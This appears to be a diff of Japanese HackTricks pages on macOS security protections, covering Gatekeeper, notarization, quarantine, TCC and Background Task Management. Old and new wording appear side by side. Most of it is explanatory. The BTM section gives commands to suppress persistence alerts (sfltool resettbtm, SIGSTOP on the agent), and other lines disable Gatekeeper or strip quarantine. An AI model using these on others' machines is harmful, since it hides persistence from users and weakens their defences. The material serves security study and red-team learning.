Gatekeeperは通常、**Quarantine + Gatekeeper + XProtect**の組み合わせを指すために使用され、これらはmacOSの3つのセキュリティモジュールであり、**ユーザーが潜在的に悪意のあるソフトウェアを実行するのを防ごうとします**
詳細情報:
詳細は次のとおりです:
{% content-ref url="macos-gatekeeper.md" %}
[macos-gatekeeper.md](macos-gatekeeper.md)
@ -34,52 +34,52 @@ Gatekeeper は通常、**Quarantine + Gatekeeper + XProtect** の組み合わせ
### サンドボックス
macOS サンドボックスは、アプリケーションが使用するサンドボックスプロファイルで指定された**許可されたアクションに制限**することで、**アプリケーションが予想されるリソースのみにアクセスする**ことを保証するのに役立ちます。
MacOSサンドボックスは、サンドボックス内で実行されるアプリケーションを**サンドボックスプロファイルで指定された許可されたアクションに制限**します。これにより、**アプリケーションが予期されるリソースにのみアクセスすることが保証**されます。
{% content-ref url="macos-sandbox/" %}
[macos-sandbox](macos-sandbox/)
{% endcontent-ref %}
### TCC - **透明性、同意、および制御**
### TCC - 透明性、同意、および制御
**TCC (透明性、同意、および制御)** は macOS のメカニズムで、通常はプライバシーの観点から、特定の機能へのアプリケーションアクセスを**制限および制御する**ものです。これには、位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、フルディスクアクセスなどが含まれます。
**TCC(透明性、同意、お制御)**はセキュリティフレームワークです。これは、アプリケーションの**権限を管理**するために設計されており、特に、アプリケーションが**機密機能へのアクセスを規制**します。これには、**位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、およびフルディスクアクセス**などの要素が含まれます。TCCは、アプリがこれらの機能にアクセスできるのは、明示的なユーザーの同意を得た後であることを確認し、プライバシーと個人データの制御を強化します。
{% content-ref url="macos-tcc/" %}
[macos-tcc](macos-tcc/)
{% endcontent-ref %}
### 起動/環境制約 & 信頼キャッシュ
### 起動/環境制約信頼キャッシュ
macOS の起動制約は、**誰が**プロセスを起動できるか、**どのように**、**どこから**起動できるかを定義することで、プロセスの開始を**規制する**セキュリティ機能です。macOS Ventura で導入され、システムバイナリを**信頼キャッシュ**内の制約カテゴリに分類します。すべての実行可能バイナリには、**自身**、**親**、および**責任者**の制約を含む**起動ルール**が設定されています。macOS Sonoma でサードパーティアプリにも**環境**制約として拡張され、プロセスの起動条件を管理することで、潜在的なシステムの悪用を軽減するのに役立ちます。
macOSの起動制約は、プロセスの開始を**規制**するセキュリティ機能であり、プロセスの**誰が**、**どのように**、**どこから**起動できるかを定義します。macOS Venturaで導入された信頼キャッシュ内の制約カテゴリにシステムバイナリを分類します。各実行可能バイナリには、**自己**、**親**、および**責任者**の制約を含む、その**起動**のための**ルール**が設定されています。macOS Sonomaでは、サードパーティアプリケーションに拡張された**環境**制約として、これらの機能はプロセスの起動条件を規制することで、潜在的なシステムの悪用を緩和します。
{% content-ref url="macos-launch-environment-constraints.md" %}
[macos-launch-environment-constraints.md](macos-launch-environment-constraints.md)
{% endcontent-ref %}
## MRT - マルウェア除ツール
## MRT - マルウェア除ツール
マルウェア削除ツール (MRT) も macOS のセキュリティインフラの一部です。名前が示すように、MRT の主な機能は、**感染したシステムから既知のマルウェアを削除する**ことです。
マルウェア除去ツールMRTは、macOSのセキュリティインフラの一部です。その名前が示すように、MRTの主な機能は、感染したシステムから既知のマルウェアを**除去すること**です。
Mac でマルウェアが検出されるとXProtect または他の手段によって、MRT は自動的に**マルウェアを削除する**ために使用できます。MRT はバックグラウンドで静かに動作し、通常はシステムが更新されるたび、または新しいマルウェア定義がダウンロードされるたびに実行されます(マルウェアを検出するための MRT のルールはバイナリ内にあるようです)。
Macでマルウェアが検出されるとXProtectによるものまたは他の手段によるもの、MRTを使用してマルウェアを自動的に**除去**できます。MRTはバックグラウンドで静かに動作し、通常、システムが更新されるときや新しいマルウェア定義がダウンロードされるときに実行されますマルウェアを検出するMRTのルールはバイナリ内にあるようです
XProtect と MRT はどちらも macOS のセキュリティ対策の一部ですが、異なる機能を果たします:
XProtectとMRTは、macOSのセキュリティ対策の一部ですが、異なる機能を果たします:
* **XProtect** は予防ツールです。特定のアプリケーションを介して**ダウンロードされるファイルをチェックし**、既知のマルウェアタイプを検出すると、ファイルが開かれるのを**防ぎ**、そもそもシステムが感染するのを防ぎます。
* **MRT** は、反応的なツールです。システムでマルウェアが検出された後に動作し、不正なソフトウェアを削除してシステムをクリーンアップすることが目的です。
- **XProtect**は予防ツールです。**ファイルをダウンロードする際に**(特定のアプリケーションを介して)、ファイルに既知のマルウェアが検出されると、**ファイルの開封を防止**して、最初にシステムにマルウェアが感染するのを防ぎます。
- 一方、**MRT**は**反応的なツール**です。システムでマルウェアが検出された後に動作し、問題のあるソフトウェアを除去してシステムをクリーンアップすることを目指します。
MRT アプリケーションは **`/Library/Apple/System/Library/CoreServices/MRT.app`** にあります。
MRTアプリケーションは、**`/Library/Apple/System/Library/CoreServices/MRT.app`**にあります。
## バックグラウンドタスク管理
## バックグラウンドタスク管理
**macOS** は、ツールがよく知られた**コード実行の永続化技術**(ログインアイテム、デーモンなど)を使用するたびに**警告**を発し、ユーザーが**どのソフトウェアが永続化しているか**をよりよく理解できるようにします。
**macOS**は今や、ツールがコード実行を維持するためのよく知られた**手法を使用するたびにアラートを表示**するため、ユーザーは**どのソフトウェアが維持されているかをよりよく把握**できます。
<figure><img src="../../../.gitbook/assets/image (711).png" alt=""><figcaption></figcaption></figure>
これは、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd` にある**デーモン**と、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app` にある**エージェント**で動作します。
これは、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd`にある**デーモン**と、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app`にある**エージェント**で実行されます。
**`backgroundtaskmanagementd`** が永続的なフォルダに何かがインストールされていることを知る方法は、**FSEvents を取得し**、それらのための**ハンドラー**を作成することです。
**`backgroundtaskmanagementd`**が永続フォルダに何かがインストールされていることを知る方法は、**FSEventsを取得**してそれらのためのいくつかの**ハンドラ**を作成することです。
さらに、Apple が維持している頻繁に永続化する**よく知られたアプリケーション**を含む plist ファイルがあり、その場所は次のとおりです:`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`
さらに、Appleが管理している**よく知られたアプリケーション**を含むplistファイルがあり、次の場所にあります:`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`
```json
[...]
"us.zoom.ZoomDaemon" => {
@ -97,31 +97,31 @@ MRT アプリケーションは **`/Library/Apple/System/Library/CoreServices/MR
```
### 列挙
AppleのCLIツールを実行して、設定されているすべてのバックグラウンド項目を**列挙する**ことが可能です:
AppleのCLIツールを使用して、設定されたすべてのバックグラウンドアイテムを列挙することが可能です:
```bash
# The tool will always ask for the users password
sfltool dumpbtm
```
さらに、この情報は[**DumpBTM**](https://github.com/objective-see/DumpBTM)を使用してリストすることも可能です。
さらに、この情報を[**DumpBTM**](https://github.com/objective-see/DumpBTM)でリストアップすることも可能です。
```bash
# You need to grant the Terminal Full Disk Access for this to work
chmod +x dumpBTM
xattr -rc dumpBTM # Remove quarantine attr
./dumpBTM
```
この情報は **`/private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm`** に保存されており、ターミナルはFDAが必要です。
この情報は**`/private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm`**に保存されており、TerminalにFDAが必要です。
### BTMをいじる
新しい永続性が見つかると、**`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`**タイプのイベントが発生します。したがって、この**イベント**の送信を**防ぐ**方法や、**エージェントがユーザーに警告するのを阻止する**方法は、攻撃者がBTMを_**バイパス**_するのに役立ちます。
新しい永続性が見つかると、**`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`**タイプのイベントが発生します。したがって、この**イベント**が送信されるのを**防止**する方法や**エージェントがユーザーに警告するのを防ぐ**方法は、攻撃者がBTMを_**バイパス**_するのに役立ちます。
* **データベースのリセット**: 以下のコマンドを実行するとデータベースがリセットされます(基本から再構築されるはずですが)、何らかの理由で、これを実行した後、**システムが再起動されるまで新しい永続性に対する警告は出ません**。
* **root** 権限が必要です。
* **データベースをリセットする**:次のコマンドを実行すると、データベースがリセットされます(基盤から再構築する必要があります)。ただし、何らかの理由で、これを実行した後、**システムが再起動されるまで新しい永続性が警告されなくなります**。
* **root**が必要です。
```bash
# Reset the database
sfltool resettbtm
```
* **エージェントを停止する**: エージェントに停止信号を送ることで、新しい検出が見つかったときに**ユーザーに警告しない**ようにすることが可能です。
* **エージェントの停止**: エージェントに停止シグナルを送信して、新しい検出が見つかった際にユーザーにアラートを表示させないようにすることが可能です。
```bash
# Get PID
pgrep BackgroundTaskManagementAgent
@ -134,9 +134,9 @@ kill -SIGSTOP 1011
ps -o state 1011
T
```
* **バグ**: **永続性を作成したプロセスが直後にすぐに終了した場合**、デーモンはそのプロセスについての**情報を取得**しようとしますが、**失敗し**、新しいものが永続していることを示すイベントを**送信できなくなります**
* **バグ**: もし**永続性を作成したプロセスがすぐに存在しなくなる**と、デーモンはそれに関する**情報を取得**しようとして**失敗**し、新しいものが永続化されていることを示すイベントを送信できなくなります
BTMについての**詳細情報**:
BTMに関する**参考文献や詳細**:
* [https://youtu.be/9hjUmT031tc?t=26481](https://youtu.be/9hjUmT031tc?t=26481)
* [https://www.patreon.com/posts/new-developer-77420730?l=fr](https://www.patreon.com/posts/new-developer-77420730?l=fr)
@ -144,14 +144,14 @@ BTMについての**詳細情報**:
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください
</details>

216
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View file

@ -2,13 +2,13 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksであなたの会社を広告したいですか** または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。これは私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**にフォローしてください。**
* **ハッキングのコツを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする**🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングトリックを共有するには、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**
*
* .
@ -16,29 +16,29 @@
## Gatekeeper
**Gatekeeper**は、ユーザーがシステム上で**信頼できるソフトウェアのみを実行する**ことを保証するために開発された、Macオペレーティングシステムのセキュリティ機能です。App Store以外の**ソースからダウンロードして開こうとする**ソフトウェア、例えばアプリ、プラグイン、インストーラーパッケージを**検証する**ことによって機能します。
**Gatekeeper**は、Macオペレーティングシステム向けに開発されたセキュリティ機能で、ユーザーがシステム上で**信頼されたソフトウェアのみを実行**することを保証するために設計されています。ユーザーがApp Store以外のソースからダウンロードして開こうとするソフトウェアを**検証**することで機能します。
Gatekeeperの主要なメカニズムは、その**検証**プロセスにあります。ダウンロードされたソフトウェアが**認識された開発者によって署名されているか**をチェックし、ソフトウェアの真正性を保証します。さらに、ソフトウェアがAppleによって**公証されているか**を確認し、既知の悪意のあるコンテンツが含まれていないこと、および公証後に改ざんされていないことを確認します。
Gatekeeperの主要なメカニズムは、その**検証**プロセスにあります。ダウンロードしたソフトウェアが**認識された開発者によって署名されているかどうか**をチェックし、ソフトウェアの信頼性を確認します。さらに、Appleによって**ノータライズ**されているかどうかを確認し、既知の悪意のあるコンテンツが含まれていないこと、およびノータライズ後に改ざんされていないことを確認します。
さらに、Gatekeeperは、ダウンロードしたソフトウェアを初めて開く際にユーザーに**承認を求める**ことで、ユーザーコントロールとセキュリティを強化します。このセーフガードは、ユーザーが誤って有害な実行可能コードを無害なデータファイルと間違えて実行することを防ぐのに役立ちます。
さらに、Gatekeeperは、ユーザーが初めてダウンロードしたソフトウェアの開きを承認するよう**ユーザーに促す**ことで、ユーザーの誤って害のある実行可能コードを実行するのを防ぐのに役立ちます。
### アプリケーション署名
アプリケーション署名、またはコード署名は、Appleのセキュリティインフラストラクチャの重要な構成要素です。これらは、ソフトウェアの作者(開発者)の**身元を検証し**、最後に署名されてからコードが改ざんされていないことを保証するために使用されます。
アプリケーション署名、またはコード署名としても知られるものは、Appleのセキュリティインフラストラクチャの重要な部分です。これらは、ソフトウェアの著者(開発者)の**身元を確認**し、コードが最後に署名されてから改ざんされていないことを確認するために使用されます。
ここにその仕組みがあります:
動作方法は次のとおりです:
1. **アプリケーションの署名** 開発者がアプリケーションの配布準備ができたら、**プライベートキーを使用してアプリケーションに署名します**。このプライベートキーは、Apple Developer Programに登録する際にAppleが開発者に発行する**証明書に関連付けられています**。署名プロセスには、アプリのすべての部分の暗号ハッシュを作成し、このハッシュを開発者のプライベートキーで暗号化することが含まれます。
2. **アプリケーションの配布** 署名されたアプリケーションは、対応する公開キーを含む開発者の証明書と共にユーザーに配布されます。
3. **アプリケーションの検証** ユーザーがダウンロードして実行しようとすると、Macオペレーティングシステムは開発者の証明書から公開キーを使用してハッシュを復号します。その後、アプリケーションの現在の状態に基づいてハッシュを再計算し、これを復号されたハッシュと比較します。一致すれば、**アプリケーションは開発者が署名してから変更されていない**ということで、システムはアプリケーションの実行を許可します。
1. **アプリケーションの署名:** 開発者がアプリケーションを配布する準備が整ったとき、**開発者はプライベートキーを使用してアプリケーションに署名**します。このプライベートキーは、Appleが開発者がApple Developer Programに登録するときに発行する**証明書**と関連付けられています。署名プロセスには、アプリのすべての部分の暗号ハッシュを作成し、このハッシュを開発者のプライベートキーで暗号化することが含まれます。
2. **アプリケーションの配布:** 署名されたアプリケーションは、開発者の証明書とともにユーザーに配布されます。この証明書には、対応する公開キーが含まれています。
3. **アプリケーションの検証:** ユーザーがアプリケーションをダウンロードして実行しようとすると、Macオペレーティングシステムは開発者の証明書から公開キーを使用してハッシュを復号します。その後、アプリケーションの現在の状態に基づいてハッシュを再計算し、これを復号されたハッシュと比較します。一致する場合、それは開発者が署名した後に**アプリケーションが変更されていない**ことを意味し、システムはアプリケーションの実行を許可します。
アプリケーション署名は、AppleのGatekeeperテクロジーの不可欠な部分です。ユーザーが**インターネットからダウンロードしたアプリケーションを開こうとする**と、Gatekeeperはアプリケーション署名を検証します。それがAppleによって発行された証明書で署名された既知の開発者のものであり、コードが改ざんされていない場合、Gatekeeperはアプリケーションの実行を許可します。そうでない場合は、アプリケーションをブロックし、ユーザーに警告します。
アプリケーション署名は、AppleのGatekeeperテクロジーの重要な部分です。ユーザーがインターネットからダウンロードしたアプリケーションを**開こうとするとき**、Gatekeeperはアプリケーションの署名を検証します。Appleが既知の開発者に発行した証明書で署名されており、コードが改ざんされていない場合、Gatekeeperはアプリケーションの実行を許可します。そうでない場合、アプリケーションをブロックしてユーザーに警告します。
macOS Catalinaから始まり、**GatekeeperはアプリケーションがAppleによって公証されているかどうかもチェックします**。これにより、セキュリティの追加層が追加されます。公証プロセスでは、アプリケーションを既知のセキュリティ問題と悪意のあるコードに対してチェックし、これらのチェックが通れば、Gatekeeperが検証できるチケットをアプリケーションに追加します。
macOS Catalinaから、**GatekeeperはアプリケーションがAppleによってノータライズされているかどうかも確認**し、追加のセキュリティレイヤーを追加します。ータライズプロセスは、アプリケーションを既知のセキュリティ問題や悪意のあるコードに対してチェックし、これらのチェックに合格した場合、AppleはGatekeeperが検証できるアプリケーションにチケットを追加します。
#### 署名のチェック
#### 署名の確認
**マルウェアサンプル**をチェックする際には、バイナリの**署名を常に確認**するべきです。署名した**開発者**が既に**マルウェア**と**関連している**可能性があります。
いくつかの**マルウェアサンプル**をチェックするときは、常にバイナリの**署名を確認**する必要があります。なぜなら、署名した**開発者**がすでに**マルウェア**と**関連**している可能性があるからです。
```bash
# Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -55,32 +55,32 @@ spctl --assess --verbose /Applications/Safari.app
# Sign a binary
codesign -s <cert-name-keychain> toolsdemo
```
### ノタリゼーション
### Notarization
Appleのタリゼーションプロセスは、ユーザーを潜在的に有害なソフトウェアから守るための追加の安全対策として機能します。これには、**開発者がアプリケーションを審査のために** **Appleのータリサービス**に提出することが含まれます。このサービスはApp Reviewと混同してはならず、**自動化されたシステム**であり、提出されたソフトウェアを**悪意のあるコンテンツ**やコード署名に関する潜在的な問題の存在について精査します。
Appleのタリゼーションプロセスは、ユーザーを潜在的に有害なソフトウェアから保護する追加のセーフガードとして機能します。これには、開発者が自分のアプリケーションをAppleのータリサービスに提出することが含まれます。このサービスはApp Reviewとは異なるものであり、提出されたソフトウェアを悪意のあるコンテンツやコードサイニングに関する潜在的な問題を検査する自動システムです。
ソフトウェアがこの検査を問題なく**合格**すると、ノータリサービスはノタリゼーションチケットを生成します。その後、開発者はこのチケットをソフトウェアに**添付する**必要があります。これは「ステープリング」と呼ばれるプロセスです。さらに、タリゼーションチケットはオンラインでも公開され、Appleのセキュリティ技術であるGatekeeperがアクセスできるようになっています。
ソフトウェアがこの検査をパスし、懸念事項がない場合、ノータリサービスはノータリゼーションチケットを生成します。その後、開発者はこのチケットをソフトウェアに添付する必要があります。このプロセスは「ステープリング」として知られています。さらに、ータリゼーションチケットはオンラインでも公開され、GatekeeperAppleのセキュリティテクロジーがアクセスできます。
ユーザーが初めてソフトウェアをインストールまたは実行する際、実行可能ファイルにステープリングされているかオンラインで見つかったかにかかわらず、ノタリゼーションチケットの存在は**ソフトウェアがAppleによってタリゼーションされたことをGatekeeperに通知します**。その結果、Gatekeeperは初回起動ダイアログに説明的なメッセージを表示し、ソフトウェアがAppleによる悪意のあるコンテンツのチェックを受けたことを示します。このプロセスにより、ユーザーは自分のシステムにインストールまたは実行するソフトウェアのセキュリティに対する信頼を高めることができます。
ユーザーがソフトウェアを初めてインストールまたは実行する際、実行可能ファイルにステープリングされたか、オンラインで見つかったータリゼーションチケットの存在により、GatekeeperにそのソフトウェアがAppleによってータリゼーションされたことが通知されます。その結果、Gatekeeperは初回起動ダイアログに記述的なメッセージを表示し、Appleによる悪意のあるコンテンツのチェックを受けたことを示します。このプロセスにより、ユーザーは自分のシステムにインストールまたは実行するソフトウェアのセキュリティに対する信頼を高めることができます。
### GateKeeperの列挙
### Enumerating GateKeeper
GateKeeperは、信頼されていないアプリが実行されるのを防ぐ**いくつかのセキュリティコンポーネント**であり、また**コンポーネントの1つ**でもあります。
GateKeeperは、実行される信頼されていないアプリケーションを防ぐいくつかのセキュリティコンポーネントであり、またその1つでもあります。
GateKeeperの**ステータス**を確認することができます:
GateKeeperのステータスを確認することができます:
```bash
# Check the status
spctl --status
```
{% hint style="danger" %}
GateKeeperの署名チェックは、**隔離属性を持つファイル**にのみ実行され、すべてのファイルに対して実行されるわけではありません
GateKeeperの署名チェックは、**Quarantine属性を持つファイル**にのみ実行されることに注意してください
{% endhint %}
GateKeeperは、**設定と署名**に従ってバイナリが実行可能かどうかをチェックします:
GateKeeperは、**設定と署名**に従ってバイナリが実行可能かどうかをチェックします:
<figure><img src="../../../.gitbook/assets/image (678).png" alt=""><figcaption></figcaption></figure>
この設定を保持するデータベースは **`/var/db/SystemPolicy`** にあります。rootとしてこのデータベースをチェックできます:
この構成を保持するデータベースは、**`/var/db/SystemPolicy`**にあります。これをルートとして次のコマンドで確認できます:
```bash
# Open database
sqlite3 /var/db/SystemPolicy
@ -94,10 +94,10 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
```
最初のルールが"**App Store**"で終わり、2番目のルールが"**Developer ID**"で終わっていること、そして前の画像では**App Storeと認識された開発者からのアプリを実行することが有効になっていた**ことに注意してください。\
その設定をApp Storeに**変更する**と、"**Notarized Developer ID"のルールが消える**でしょう
注意してください、最初のルールは "**App Store**" で終わり、2番目のルールは "**Developer ID**" で終わり、前の画像では **App Store および識別された開発者からのアプリの実行が有効** になっていました。\
その設定を App Store に変更すると、"**Notarized Developer ID**" ルールが消えます
また、**type GKE**のルールが数千もあります:
**GKE タイプ** のルールも何千もあります。
```bash
SELECT requirement,allow,disabled,label from authority where label = 'GKE' limit 5;
cdhash H"b40281d347dc574ae0850682f0fd1173aa2d0a39"|1|0|GKE
@ -106,13 +106,13 @@ cdhash H"4317047eefac8125ce4d44cab0eb7b1dff29d19a"|1|0|GKE
cdhash H"0a71962e7a32f0c2b41ddb1fb8403f3420e1d861"|1|0|GKE
cdhash H"8d0d90ff23c3071211646c4c9c607cdb601cb18f"|1|0|GKE
```
以下は、**`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth`、`/var/db/gke.bundle/Contents/Resources/gk.db`** および **`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`** から得られるハッシュです。
これらは、**`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth`、`/var/db/gke.bundle/Contents/Resources/gk.db`**、および**`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`**から取得されるハッシュです。
または、以下のコマンドで前述の情報をリストすることができます:
または、前述の情報をリストすることもできます:
```bash
sudo spctl --list
```
オプション **`--master-disable`** と **`--global-disable`** は、**`spctl`** のこれらの署名チェックを完全に**無効化**します:
オプション**`--master-disable`**と**`--global-disable`**は、**`spctl`**の署名チェックを完全に**無効**にします。
```bash
# Disable GateKeeper
spctl --global-disable
@ -126,11 +126,11 @@ spctl --master-enable
<figure><img src="../../../.gitbook/assets/image (679).png" alt=""><figcaption></figcaption></figure>
**GateKeeperによってアプリが許可されるかどうかを確認する**ことができます:
GateKeeperによってアプリが許可されるかどうかを**チェック**することが可能です。
```bash
spctl --assess -v /Applications/App.app
```
GateKeeperに新しいルールを追加して、特定のアプリの実行を許可することができます:
GateKeeperに新しいルールを追加して、特定のアプリの実行を許可することができます
```bash
# Check if allowed - nop
spctl --assess -v /Applications/App.app
@ -145,27 +145,27 @@ sudo spctl --enable --label "whitelist"
spctl --assess -v /Applications/App.app
/Applications/App.app: accepted
```
### カレンタインファイル
### ファイルの隔離
特定のmacOS **アプリケーション**ウェブブラウザーやメールクライアントなど)は、アプリケーションやファイルを**ダウンロード**する際に、一般的に"**カレンタインフラグ**"として知られる拡張ファイル属性をダウンロードしたファイルに**付加します**。この属性は、ファイルが信頼できないソース(インターネット)から来たものであり、リスクを伴う可能性があることを**マークする**ためのセキュリティ対策として機能します。しかし、この属性を付加するアプリケーションはすべてではありません。例えば、一般的なBitTorrentクライアントソフトウェアは通常、このプロセスをバイパスします。
特定のmacOS **アプリケーション**Webブラウザやメールクライアントなどが、アプリケーションやファイルを**ダウンロード**する際に、一般的に「**隔離フラグ**」として知られる**拡張ファイル属性**をダウンロードされたファイルに**添付**します。この属性は、ファイルを信頼できないソース(インターネット)から取得したものとしてマークし、潜在的なリスクを持つ可能性があることを示すセキュリティ対策として機能します。ただし、一部のアプリケーションはこの属性を添付しないこともあります。たとえば、一般的なBitTorrentクライアントソフトウェアは通常、このプロセスをバイパスします。
**カレンタインフラグの存在は、ユーザーがファイルを実行しようとしたときにmacOSのGatekeeperセキュリティ機能に信号を送ります**
**隔離フラグが存在する場合**一部のBitTorrentクライアントを介してダウンロードされたファイルなど、ユーザーがファイルを実行しようとすると、macOSのGatekeeperセキュリティ機能が作動します
**カレンタインフラグが存在しない**場合一部のBitTorrentクライアントでダウンロードされたファイルなど、Gatekeeperの**チェックが実行されない**可能性があります。したがって、ユーザーはセキュリティが低い、または不明なソースからダウンロードしたファイルを開く際には注意が必要です。
**隔離フラグが存在しない場合**一部のBitTorrentクライアントを介してダウンロードされたファイルなど、Gatekeeperの**チェックが実行されない**可能性があります。したがって、ユーザーは安全でないまたは不明なソースからダウンロードしたファイルを開く際には注意を払う必要があります。
{% hint style="info" %}
コード署名の**有効性をチェックする**ことは、コードとそのすべてのバンドルされたリソースの暗号学的な**ハッシュ**を生成することを含む**リソース集約型**のプロセスです。さらに、証明書の有効性をチェックするには、発行後に取り消されていないかを確認するためにAppleのサーバーに対して**オンラインチェック**を行う必要があります。これらの理由から、完全なコード署名と公証チェックをアプリが起動されるたびに実行することは**非現実的です**。
コード署名の**有効性**を**チェック**することは、コードとそのバンドルされたリソースの暗号ハッシュを生成するなど、**リソースを多く消費する**プロセスです。さらに、証明書の有効性をチェックするには、発行後に取り消されたかどうかをAppleのサーバーに**オンラインで確認**する必要があります。これらの理由から、完全なコード署名と検証チェックは、アプリが起動するたびに実行するのは**実用的ではありません**。
したがって、これらのチェックは**カレンタイン属性を持つアプリを実行するときにのみ実行されます。**
したがって、これらのチェックは**隔離属性を持つアプリを実行するときにのみ実行**されます。
{% endhint %}
{% hint style="warning" %}
この属性は、ファイルを**作成/ダウンロードするアプリケーションによって設定されなければなりません**。
この属性は、ファイルを作成/ダウンロードする**アプリケーションによって設定**する必要があります
ただし、サンドボックス化されたファイルは、作成されすべてのファイルにこの属性が設定されます。そして、サンドボックス化されていないアプリは、自ら設定することもできますし、**Info.plist**内の[**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc)キーを指定することで、作成されたファイルに`com.apple.quarantine`拡張属性をシステムが設定するようにすることもできます。
